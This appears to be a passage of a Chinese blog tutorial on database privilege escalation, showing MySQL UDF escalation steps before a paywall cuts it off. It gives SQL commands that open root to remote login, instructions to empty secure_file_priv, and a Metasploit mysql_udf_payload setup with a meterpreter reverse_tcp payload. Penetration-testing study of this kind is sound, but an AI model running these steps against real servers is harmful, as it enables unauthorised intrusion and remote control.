本文详细介绍了如何在MySQL、SQLServer、Oracle等数据库中通过各种方式提权,包括UDF提权、Mof提权、启动项提权以及利用沙盒功能执行系统命令。同时强调了安全设置如secure_file_priv的重要性,并提供了相应的防护措施。
数据库提权
Mysql
udf提权(用户自定义函数)
条件:
开启外部连接
知道账户密码(配置文件)
有写入权限
开启数据库外联
mysql> use mysql;
mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
mysql> flush privileges;
关闭数据库外联
mysql> use mysql;
mysql> DELETE FROM user WHERE User="root" and Host="%";
mysql> FLUSH PRIVILEGES;udf存放路径:
mysql <5.1 c:/windows 或 system32
mysql>=5.1 /lib/plugin
select version(); //获取版本
select @@basedir; //获取mysql安装目录
show global variables like '%secure%'; //查看是否有写入权限(secure_file_priv= )
如何更改secure_file_priv的值:
windows下:
修改my.ini 在[mysqld]内加入secure_file_priv=""
linux下:
修改my.cnf 在[mysqld]内加入secure_file_priv=""
MYSQL新特性secure_file_priv对读写文件的影响
然后重启mysql,再查询secure_file_priv注意:
linux: .so
windows: .dllmsf生成dll
use exploit/multi/mysql/mysql_udf_payload
set payload windows/meterpreter/reverse_tcp
set password root
set username root
set rhosts 192.168.x.x
runqlmap生成dll
sqlm
最低0.47元/天 解锁文章
扫一扫
1487
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
